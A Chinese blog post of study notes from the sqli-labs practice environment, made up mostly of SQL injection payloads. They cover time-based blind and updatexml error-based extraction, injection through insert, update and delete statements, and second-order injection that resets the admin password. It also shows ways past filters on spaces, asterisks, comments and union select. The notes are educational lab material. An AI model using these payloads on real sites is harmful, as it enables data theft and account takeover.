<!DOCTYPE html>




<html class="theme-next gemini" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">

<script>
    (function(){
        if(''){
            if (prompt('Enter password') !== ''){
                alert('Error！');
                history.back();
            }
        }
    })();
</script>








<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="SQL注入,">










<meta name="description" content="走了一遍sqli-labs，简单记录一下其中一些知识点(持续更新SQL注入相关的小trick)">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入杂记">
<meta property="og:url" content="http://yoursite.com/2019/08/01/SQL注入杂记/index.html">
<meta property="og:site_name" content="故人梦">
<meta property="og:description" content="走了一遍sqli-labs，简单记录一下其中一些知识点(持续更新SQL注入相关的小trick)">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard2.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard3.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard4.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard5.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard6.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard7.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard8.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard9.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard10.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard11.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard12.png">
<meta property="og:image" content="https://k-ring.github.io/img/clipboard13.png">
<meta property="og:image" content="https://k-ring.github.io/img/sql1.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql2.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql3.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql8.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql9.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql10.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql11.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql12.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql13.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql14.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql4.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql5.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql6.jpg">
<meta property="og:image" content="https://k-ring.github.io/img/sql7.jpg">
<meta property="og:updated_time" content="2019-11-03T02:02:28.748Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入杂记">
<meta name="twitter:description" content="走了一遍sqli-labs，简单记录一下其中一些知识点(持续更新SQL注入相关的小trick)">
<meta name="twitter:image" content="https://k-ring.github.io/img/clipboard.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/08/01/SQL注入杂记/">





  <title>SQL注入杂记 | 故人梦</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">故人梦</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">至今朝，忆往昔、</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-resources">
          <a href="/resources/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-modx"></i> <br>
            
            资源
          </a>
        </li>
      
        
        <li class="menu-item menu-item-link">
          <a href="/link/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-link"></i> <br>
            
            友链
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/08/01/SQL注入杂记/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="故人梦">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="故人梦">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入杂记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-08-01T00:00:00+08:00">
                2019-08-01
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/注入/" itemprop="url" rel="index">
                    <span itemprop="name">注入</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  4,768 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  21 分钟
                </span>
              
            </div>
          

          
              <div class="post-description">
                  走了一遍sqli-labs，简单记录一下其中一些知识点(持续更新SQL注入相关的小trick)
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="参数类型及其SQL语句中参数的修饰"><a href="#参数类型及其SQL语句中参数的修饰" class="headerlink" title="参数类型及其SQL语句中参数的修饰"></a>参数类型及其SQL语句中参数的修饰</h3><p>SQL语句对参数的修饰除了<code>int型</code>，<code>单引号(&#39;)，双引号(&quot;)，搜索型1(&#39;%%&#39;)，搜索型2(&quot;%%&quot;)</code>，每一种都可以使用<code>圆括号(())</code>包裹。  </p>
<p><img src="https://k-ring.github.io/img/clipboard.png" alt></p>
<p><img src="https://k-ring.github.io/img/clipboard2.png" alt></p>
<p><img src="https://k-ring.github.io/img/clipboard3.png" alt>  </p>
<p>或者使用多重圆括号包裹，在测试的时候应该考虑到每一种情况。  </p>
<p><img src="https://k-ring.github.io/img/clipboard4.png" alt>   </p>
<h3 id="时间盲注检测注入"><a href="#时间盲注检测注入" class="headerlink" title="时间盲注检测注入"></a>时间盲注检测注入</h3><p>有的时候and 1=1 和 and 1=2并不奏效，页面没有变化，这时还可以使用时间盲注探测该处是否存在注入点：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">id=1&apos;) and (select * from (select(sleep(5)))x) and (&apos;1&apos;=&apos;1      //注入的时候优先考虑闭合符号，而不是注释结尾，因为很多时候过滤了注释符</span><br><span class="line"></span><br><span class="line">//当是登录处或其他地方拿不准参数是否存在时使用or，例如username值不确定是否存在admin，例如图1，and 要都为真时才会执行</span><br><span class="line">id=1&apos; or (select * from (select sleep(5))x)-- +</span><br><span class="line">//最好不直接使用  or sleep(5)  或者  or (select sleep(5))，这样sleep 1秒的时间相当于4~5s，例如图2</span><br></pre></td></tr></table></figure></p>
<p>图一：<br><img src="https://k-ring.github.io/img/clipboard5.png" alt><br>图二：<br><img src="https://k-ring.github.io/img/clipboard6.png" alt>  </p>
<h3 id="密码框的注入检测"><a href="#密码框的注入检测" class="headerlink" title="密码框的注入检测"></a>密码框的注入检测</h3><p>在修改密码阶段，除了测试用户名处是否存在注入，也要测试密码处是否存在注入，这种情况存在于：程序严格过滤了用户输入的用户名，但是没有过滤密码，程序会先查找是否存在该用户，如果存在就进行更改密码的操作。也就是说测试注入时需要输入存在的用户名，先通过第一步验证。  </p>
<p>只要是密码没有经过加密，直接拼接，任何密码框都是可能存在注入的。  </p>
<h3 id="insert、update、delete注入"><a href="#insert、update、delete注入" class="headerlink" title="insert、update、delete注入"></a>insert、update、delete注入</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">//insert: insert报错注入的报错函数在values值里面</span><br><span class="line">insert into flag values (6,updatexml(1,concat(&apos;~&apos;,(select database())),1))-- +</span><br><span class="line"></span><br><span class="line">//update: update报错注入类似于select</span><br><span class="line">update flag set flag = &quot;test&quot; where id = 4 and updatexml(1,concat(&apos;~&apos;,@@version),1)-- +;</span><br><span class="line">或者</span><br><span class="line">update flag set flag = &quot;test&quot; and updatexml(1,concat(&apos;~&apos;,@@version),1)-- +;</span><br><span class="line"></span><br><span class="line">delete: delete也类似于select</span><br><span class="line">delete from flag where id=1 and updatexml(1,concat(&apos;~&apos;,@@version),1)-- +;</span><br></pre></td></tr></table></figure>
<h3 id="update、delete、insert注入判断"><a href="#update、delete、insert注入判断" class="headerlink" title="update、delete、insert注入判断"></a>update、delete、insert注入判断</h3><p>在update，delete，insert判断注入的时候可以通过延时注入来进行判断  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">update flag set flag = &quot;test&quot; where id=1 and (select * from (select sleep(3))x);</span><br><span class="line"></span><br><span class="line">delete from flag where id=10 and (select * from (select sleep(3))x);</span><br><span class="line"></span><br><span class="line">insert into flag values (1, (select * from (select sleep(3))x))-- +   //检测是否存在二次注入，可以插入恶意</span><br></pre></td></tr></table></figure>
<p>在上述进行update和delete操作检测是否存在注入的时候，坚决不使用or，使用and，不然会影响公司业务的正常运行。  </p>
<h3 id="header头注入点"><a href="#header头注入点" class="headerlink" title="header头注入点"></a>header头注入点</h3><p>常见的header头注入的注入点存在于：User-Agent，Referer，X-Forwarded-For，Cookie  </p>
<h3 id="二次注入的简单应用"><a href="#二次注入的简单应用" class="headerlink" title="二次注入的简单应用"></a>二次注入的简单应用</h3><p>修改密码处的二次注入。由于对用户输入进行了转义，常规注入失去了作用，可以注册类似于 admin’– + 的用户名，如果程序SQL语句是拼接的话，修改密码时的update语句大概就是：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">update user set pass=$password where username=&apos;admin&apos;-- +&apos; and pass=$old_password;</span><br></pre></td></tr></table></figure></p>
<p>通过注释可以绕过原密码的验证，进而修改admin用户的密码。</p>
<h3 id="绕过空格过滤"><a href="#绕过空格过滤" class="headerlink" title="绕过空格过滤"></a>绕过空格过滤</h3><h4 id="使用科学计数法可以忽略空格"><a href="#使用科学计数法可以忽略空格" class="headerlink" title="使用科学计数法可以忽略空格"></a>使用科学计数法可以忽略空格</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from flag where id=0e1union select user,1e1from mysql.user</span><br></pre></td></tr></table></figure>
<p><img src="https://k-ring.github.io/img/clipboard7.png" alt>  </p>
<h4 id="空白字符"><a href="#空白字符" class="headerlink" title="空白字符"></a>空白字符</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SQLite3：0A 0D 0C 09 20</span><br><span class="line">MySQL5：09 0A 0B 0C 0D A0 20</span><br><span class="line">PosgresSQL：0A 0D 0C 09 20</span><br><span class="line">Oracle：11g 00 0A 0D 0C 09 20</span><br><span class="line">MSSQL：01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20</span><br></pre></td></tr></table></figure>
<h4 id="加号-连接符"><a href="#加号-连接符" class="headerlink" title="加号(+)连接符"></a>加号(+)连接符</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&apos;+and+updatexml(1,concat(&apos;~&apos;,@@version),1)--+-</span><br></pre></td></tr></table></figure>
<h4 id="小数点-连接"><a href="#小数点-连接" class="headerlink" title="小数点(.)连接"></a>小数点(.)连接</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select * from flag where id=.2and(updatexml(1,concat(&apos;~&apos;,@@version),1))</span><br><span class="line">select * from flag where id=&apos;2&apos;and(updatexml(1,concat(&apos;~&apos;,@@version),1))</span><br><span class="line">select * from flag where id=&quot;2&quot;and(updatexml(1,concat(&apos;~&apos;,@@version),1))</span><br></pre></td></tr></table></figure>
<p>如果是int型则必须要使用小数点(.)<br><img src="https://k-ring.github.io/img/clipboard8.png" alt>  </p>
<p>闭合引号：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select * from flag where id=&apos;.2&apos;and(updatexml(1,concat(&apos;~&apos;,@@version),1))and&apos;1&apos;=&apos;1&apos;</span><br><span class="line">select * from flag where id=&apos;.2&apos;and(updatexml(1,concat(&apos;~&apos;,@@version),1))and&apos;1&apos;</span><br></pre></td></tr></table></figure></p>
<p>通过测试发现 and,union,select,or等这些连接词 直接连接字符串是正常语句，所以可以直接连接and进行闭合(这些字符串也可用反引号(<code></code>)代替引号，测试使用having时反引号会出数据，引号没有数据)  </p>
<h4 id="圆括号"><a href="#圆括号" class="headerlink" title="圆括号(())"></a>圆括号(())</h4><p>上面基本都是用的圆括号绕过空格<br>圆括号绕过语句：<br>在使用括号进行绕过空格时，原则是要保持select、from、where等完整语句的关键词在同一条语句中，不能使用括号将关键词分隔开，不能类似于：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select*from(users(where(id=1)))</span><br></pre></td></tr></table></figure></p>
<p>正确分割语句：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select*from(users)where(id=1)</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">联合注入：</span><br><span class="line">如果全为括号不能通过order by查找字段，可以使用盲注或者报错注入</span><br><span class="line">1、猜测字段</span><br><span class="line">http://127.0.0.1/index.php?id=.1union(select(1),2,3,4)   //一个字段一个字段的猜测</span><br><span class="line">2、如果有报错注入</span><br><span class="line">http://127.0.0.1/index.php?id=.1and(updatexml(1,concat(0x7e,(select(count(*))from(information_schema.columns)where(table_name=&apos;users&apos;)),0x7e),1))     //如果遇到在整个数据库中有多个表名一样的，则爆出的数量会大于实际列数</span><br><span class="line">3、盲注类似的</span><br><span class="line"></span><br><span class="line">如果有报错可直接出数据，如果没有，则可以结合盲注</span><br><span class="line">语句都类似：</span><br><span class="line">查询数据表：select(group_concat(table_name))from(information_schema.tables)where(table_schema)rlike(database())</span><br><span class="line"></span><br><span class="line">如果有引号闭合：</span><br><span class="line">在联合查询中没法直接闭合，在报错和盲注情况下可以闭合引号，使用多个逻辑判断可以闭合引号（适用于过滤了注释的条件下）：  </span><br><span class="line">报错：</span><br><span class="line">select * from users where id = &apos;.1&apos;and(updatexml(1,concat(0x7e,database(),0x7e),1))and&apos;&apos;</span><br><span class="line"></span><br><span class="line">盲注：</span><br><span class="line">select * from users where id = &apos;.1&apos;or(select*from(select(if(length(database())&gt;1,sleep(1),1)))x)</span><br></pre></td></tr></table></figure>
<h3 id="绕过星号-过滤"><a href="#绕过星号-过滤" class="headerlink" title="绕过星号(*)过滤"></a>绕过星号(*)过滤</h3><p>在报错注入中，如果过滤了所有空格和<em>，可以用一个字符串代替星号(</em>)将两个连接符连接起来：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">selecT * from flag where id=&apos;1&apos;and(SeLecT&apos;x&apos;from(select(updatexml(1,concat(&apos;~&apos;,@@version),1)))x)and&apos;1&apos;=&apos;1&apos;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/clipboard9.png" alt>  </p>
<p>或者使用sleep判断是否存在注入点的时候：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">selecT * from flag where id=&apos;1&apos;and(SeLecT&apos;x&apos;from(select(sleep(3)))x)and&apos;1&apos;=&apos;1&apos;</span><br></pre></td></tr></table></figure></p>
<h3 id="过滤空格的SQL语句"><a href="#过滤空格的SQL语句" class="headerlink" title="过滤空格的SQL语句"></a>过滤空格的SQL语句</h3><p>过滤空格在使用select table_name from information_schema.tables…… 这类语句进行注入的时候也可以使用括号：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">selecT * from flag where id=&apos;1&apos;and(select&apos;x&apos;from(select(if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=&apos;security&apos;)),1,1))&gt;1,sleep(3),1)))x)</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/clipboard10.png" alt>  </p>
<p>简化一下其实就是：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select group_concat(table_name) from information_schema.tables where table_schema rlike database();</span><br><span class="line">//这里rlike也可以使用regexp</span><br><span class="line">select(group_concat(table_name))from(information_schema.tables)where(table_schema)rlike(database());</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/clipboard11.png" alt>  </p>
<h3 id="MySQL常用的sql函数及关键字"><a href="#MySQL常用的sql函数及关键字" class="headerlink" title="MySQL常用的sql函数及关键字"></a>MySQL常用的sql函数及关键字</h3><p>MySQL：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">union distinct             返回唯一不同的值</span><br><span class="line">union distinctrow</span><br><span class="line">procedure analyse()        分析表中数据，给出建议，使用方式：select * from flag procedure analyse()</span><br><span class="line">updatexml()                更新xml文档</span><br><span class="line">extracavalue()             查找xml文档</span><br><span class="line">exp()                      以e为底的X的对数，用于double型数据溢出注入，注入语句：select exp(~(select*from(select version())x))    不知道是不是版本的问题，测试一直未成功。</span><br><span class="line">ceil(X)/ceiling()          向上取整，返回不小于X的最小整数   </span><br><span class="line">atan(X)                    返回X的反正切值  </span><br><span class="line">sqrt(X)                    返回X的平方根</span><br><span class="line">floor()                    返回小于X的最大整数</span><br><span class="line">tan()</span><br><span class="line">rand()                     基于种子返回随机数</span><br><span class="line">sign(x)                    x大于0返回1，小于0返回-1，等于0返回0  </span><br><span class="line">greatest(x1,x2,x3)         返回最大值</span><br><span class="line"></span><br><span class="line">字符串截取函数:</span><br><span class="line">Mid(version(),1,1)</span><br><span class="line">Substr(version(),1,1)</span><br><span class="line">Substring(version(),1,1)</span><br><span class="line">Lpad(version(),1,1)</span><br><span class="line">Rpad(version(),1,1)</span><br><span class="line">Left(version(),1)</span><br><span class="line">reverse(right(reverse(version()),1))</span><br><span class="line"></span><br><span class="line">字符串连接函数</span><br><span class="line">concat(version(),&apos;|&apos;,user());</span><br><span class="line">concat_ws(&apos;|&apos;,1,2,3)</span><br><span class="line">group_concat(1,2)</span><br><span class="line"></span><br><span class="line">字符转换</span><br><span class="line">char(49)</span><br><span class="line">hex(&apos;a&apos;)</span><br><span class="line">unhex(61)</span><br><span class="line">ord(&apos;a&apos;)</span><br><span class="line">ascii(&apos;a&apos;)</span><br><span class="line"></span><br><span class="line">过滤了逗号</span><br><span class="line">1)limit处的逗号：</span><br><span class="line">limit 1 offset 0</span><br><span class="line">2)字符串截取处的逗号</span><br><span class="line">mid处的逗号：</span><br><span class="line">mid(version() from 1 for 1)</span><br></pre></td></tr></table></figure></p>
<p>MSSQL：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">IS_SRVROLEMEMBER()</span><br><span class="line">IS_MEMBER()</span><br><span class="line">HAS_DBACCESS()</span><br><span class="line">convert()</span><br><span class="line">col_name()</span><br><span class="line">object_id()</span><br><span class="line">is_srvrolemember()</span><br><span class="line">is_member()</span><br><span class="line"></span><br><span class="line">字符串截取函数</span><br><span class="line">Substring(@@version,1,1)</span><br><span class="line">Left(@@version,1)</span><br><span class="line">Right(@@version,1)</span><br><span class="line"></span><br><span class="line">(2)字符串转换函数</span><br><span class="line">Ascii(&apos;a&apos;) 这里的函数可以在括号之间添加空格的，一些waf过滤不严会导致bypass</span><br><span class="line">Char(&apos;97&apos;)</span><br><span class="line">//这些函数与括号之间可以存在空格，一定情况下可以bypass。</span><br></pre></td></tr></table></figure></p>
<h3 id="MySQL自定义变量"><a href="#MySQL自定义变量" class="headerlink" title="MySQL自定义变量"></a>MySQL自定义变量</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">set @a:=123</span><br><span class="line">select @a</span><br></pre></td></tr></table></figure>
<p><img src="https://k-ring.github.io/img/clipboard12.png" alt>  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from flag where id=1 and @db:=(select database()) union select 2,@db</span><br></pre></td></tr></table></figure>
<p><img src="https://k-ring.github.io/img/clipboard13.png" alt>  </p>
<p>适用于某些过滤，比如<code>union+select+from</code></p>
<h3 id="union-select绕过"><a href="#union-select绕过" class="headerlink" title="union select绕过"></a>union select绕过</h3><p>有些waf过滤了union select，union 和 select可以单独出现，但是在一起就会被过滤，这个的方法也有很多</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1)双写绕过</span><br><span class="line">unionunion select select</span><br><span class="line"></span><br><span class="line">2)在union 和 select之间加其他限定词之类的，比如：all，distinct，distinctrow</span><br><span class="line">union distinct/distinctrow select</span><br><span class="line"></span><br><span class="line">3)没有过滤/**/的情况下，也可以使用/**/绕过</span><br><span class="line">union/**/select</span><br><span class="line">uni/**/on select</span><br><span class="line">/*!union*/select</span><br><span class="line"></span><br><span class="line">4)union--%0e%0aselect</span><br><span class="line">union--%0e%0aselect        --表示注释后面的内容，%0e删除自身， %0a换行</span><br></pre></td></tr></table></figure>
<h3 id="sleep-简单用法"><a href="#sleep-简单用法" class="headerlink" title="sleep()简单用法"></a>sleep()简单用法</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select 123 and sleep(ascii(mid(database(),1,1))=116)</span><br></pre></td></tr></table></figure>
<p>如果里面的执行结果正确，sleep 1s，如果错误，sleep 0s<br>因为如果执行正确返回1，错误返回0。   </p>
<h3 id="过滤-和-注释符"><a href="#过滤-和-注释符" class="headerlink" title="过滤--和#注释符"></a>过滤<code>--</code>和<code>#</code>注释符</h3><p>过滤了注释符，通常我们能想到的是通过闭合来使语句正常<br>例如：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/index.php?usename=admin</span><br><span class="line"></span><br><span class="line">后端实现sql语句：select * from users where username=&apos;admin&apos;</span><br><span class="line"></span><br><span class="line">使用闭合：http://127.0.0.1/index.php?username=admin&apos; and &apos;1&apos;=&apos;1</span><br></pre></td></tr></table></figure></p>
<p>如果这里只存在联合注入的话，那么我们需要知道字段数，而如果只是像先前那样直接闭合的话：   </p>
<blockquote>
<p><a href="http://127.0.0.1/index.php?username=admin&#39;" target="_blank" rel="noopener">http://127.0.0.1/index.php?username=admin&#39;</a> order by ‘5</p>
</blockquote>
<p>相当于是按照一个字符串来排序，返回默认排序，这样根本查询不到数据表有多少个字段<br><img src="https://k-ring.github.io/img/sql1.jpg" alt>  </p>
